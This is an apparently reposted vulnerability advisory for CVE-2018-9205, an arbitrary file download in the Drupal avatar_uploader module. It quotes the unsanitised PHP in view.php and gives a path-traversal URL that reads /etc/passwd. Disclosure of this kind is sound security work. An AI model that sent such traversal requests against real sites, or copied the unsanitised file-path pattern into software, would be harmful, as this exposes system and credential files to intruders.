Drupal Avatar Uploader 7.x-1.0-beta8 Arbitary File Download

Authors:Larry Cashdollar    Risk:Medium

CVE:CVE-2018-9205          0day:Arbitary File Download

0day-id:0DAY-9205           Date:2018-04-23


Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesn’t verify users or sanitize the file path.


This module used Simple Ajax Uploader, and provide a basic uploader panel, for more effect, you can do your custom javascript. Such as, users’ mouse hover on avatar, the edit link will slideup, or others.


Title: Arbitrary file download vulnerability in Drupal module avatar_uploader v7.x-1.0-beta8
Author: Larry W. Cashdollar
Download Site: https://www.drupal.org/project/avatar_uploader
Vendor: https://www.drupal.org/u/robbinzhao
Vendor Notified: 2018-04-02
Vendor Contact: https://www.drupal.org/project/avatar_uploader/issues/2957966#comment-12554146
Advisory: http://www.vapidlabs.com/advisory.php?v=202

$file = $_GET['file'];
echo file_get_contents("uploadDir/$file");
Exploit Code:
  aC/ http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

Leave a Reply